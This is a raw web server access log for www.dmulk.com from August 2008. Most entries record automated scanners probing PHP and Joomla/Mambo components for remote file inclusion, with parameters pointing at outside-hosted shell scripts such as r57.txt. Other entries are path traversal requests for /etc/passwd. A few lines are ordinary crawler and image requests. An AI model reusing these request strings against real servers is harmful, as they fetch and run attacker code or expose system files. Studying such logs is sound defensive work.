66.187.101.26 - - [28/Aug/2008:11:58:24 -0700] "GET /logs//components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:58:24 -0700] "GET //components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:58:24 -0700] "GET /logs/access_071222.log//components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:11:58:25 -0700] "GET /logs/access_080226.log//components/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:58:26 -0700] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:58:26 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:58:26 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.249.82 - - [28/Aug/2008:11:58:32 -0700] "GET /logs//tools/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
61.19.249.82 - - [28/Aug/2008:11:58:32 -0700] "GET //tools/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:58:34 -0700] "GET /logs/access_080303.log/popup.php?path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:58:35 -0700] "GET /popup.php?path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:58:35 -0700] "GET /logs/popup.php?path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:58:36 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:58:37 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:58:49 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:58:50 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:58:51 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:58:52 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:58:57 -0700] "GET /logs/access_080616.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:58:59 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 200 85371 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:59:00 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:59:01 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [28/Aug/2008:11:59:02 -0700] "GET //index.php?option=com_custompages&cpage=http://septimamaipu.cl/septima/mambots/idbr.txt?? HTTP/1.1" 200 85263 "-" "libwww-perl/5.805" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:11:59:02 -0700] "GET /logs/access_080501.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:59:07 -0700] "GET /logs/access_070813.log HTTP/1.0" 200 98487 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:59:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0007.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:59:22 -0700] "GET /bikes/dteel/2008_07_20/?M=D HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:59:22 -0700] "GET /logs/access_080811.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.230.66 - - [28/Aug/2008:11:59:26 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
78.129.230.66 - - [28/Aug/2008:11:59:26 -0700] "GET /include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:59:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:59:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:59:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:59:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.205.57.211 - - [28/Aug/2008:11:59:56 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.205.57.211 - - [28/Aug/2008:11:59:56 -0700] "GET /include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.192.48.154 - - [28/Aug/2008:11:59:58 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.192.48.154 - - [28/Aug/2008:11:59:59 -0700] "GET /include/bbs.lib.inc.php?site_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:12:00:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:12:00:13 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.187.101.26 - - [28/Aug/2008:12:00:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:00:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0134.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:01:15 -0700] "GET /logs/access_080408.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:01:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0019.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.246.2.29 - - [28/Aug/2008:12:02:11 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.2.29 - - [28/Aug/2008:12:02:12 -0700] "GET /?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 85159 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.2.29 - - [28/Aug/2008:12:02:13 -0700] "GET /logs/?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 62571 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:03:19 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0174.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.6.18.216 - - [28/Aug/2008:12:03:26 -0700] "GET /logs/access_070726.log HTTP/1.0" 200 41609 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:03:46 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0098.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
190.30.163.170 - - [28/Aug/2008:12:04:10 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:12:04:17 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:12:04:30 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:04:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0067.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:04:43 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:04:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:04:43 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:04:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0002.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
69.64.34.172 - - [28/Aug/2008:12:04:48 -0700] "GET /logs/access_080209.log/index.php?lang=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:12:04:48 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:12:04:51 -0700] "GET /logs/access_071228.log/index.php?sub=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:12:04:51 -0700] "GET /logs/index.php?lang=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:12:04:53 -0700] "GET /index.php?sub=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85243 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:12:04:53 -0700] "GET /index.php?lang=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 85191 "-" "libwww-perl/5.805" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:12:04:53 -0700] "GET /logs/index.php?sub=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:04:58 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:04:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:04:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:05:12 -0700] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.17 - - [28/Aug/2008:12:05:23 -0700] "GET /logs/modules/public/calendar.php?baseDir=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
62.140.19.17 - - [28/Aug/2008:12:05:23 -0700] "GET /modules/public/calendar.php?baseDir=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:12:05:55 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0086.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:06:00 -0700] "GET /logs/access_080723.log//view_video.php?viewkey=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:06:01 -0700] "GET //view_video.php?viewkey=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:06:01 -0700] "GET /logs//view_video.php?viewkey=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.225.157.1 - - [28/Aug/2008:12:06:20 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.225.157.1 - - [28/Aug/2008:12:06:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.225.157.1 - - [28/Aug/2008:12:06:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:06:37 -0700] "GET /logs/access_080722.log//view_video.php?viewkey=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:06:41 -0700] "GET /logs/access_080409.log/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:06:41 -0700] "GET /components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:06:41 -0700] "GET /logs/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:12:06:45 -0700] "GET /blog/index.php/category/uncategorized/ HTTP/1.0" 200 9937 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:12:06:45 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/category/uncategorized/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:12:06:45 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/category/uncategorized/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:12:06:45 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/category/uncategorized/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
66.147.239.184 - - [28/Aug/2008:12:06:53 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.147.239.184 - - [28/Aug/2008:12:06:55 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 200 85335 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:07:12 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:07:12 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:07:13 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:07:16 -0700] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:07:17 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:07:18 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:07:31 -0700] "GET /logs/access_080818.log//sonda/booth.php?include_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:07:32 -0700] "GET //sonda/booth.php?include_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [28/Aug/2008:12:07:32 -0700] "GET /logs//sonda/booth.php?include_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.133.175 - - [28/Aug/2008:12:07:33 -0700] "GET /logs/access_080820.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.133.175 - - [28/Aug/2008:12:07:33 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.133.175 - - [28/Aug/2008:12:07:34 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:07:35 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:07:35 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:12:07:35 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:12:07:37 -0700] "GET /logs/access_080720.log/index.php?sub=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:07:46 -0700] "GET /logs/access_080114.log//claroline/tracking/userLog.php?rootSys=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:12:07:46 -0700] "GET /logs/access_080302.log/popup.php?path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:07:46 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:12:07:47 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.133.175 - - [28/Aug/2008:12:07:50 -0700] "GET /logs/access_080329.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:07:50 -0700] "GET /logs/access_080806.log/multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:07:50 -0700] "GET /multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [28/Aug/2008:12:07:51 -0700] "GET /logs/multithumb.php?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:07:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:12:07:57 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
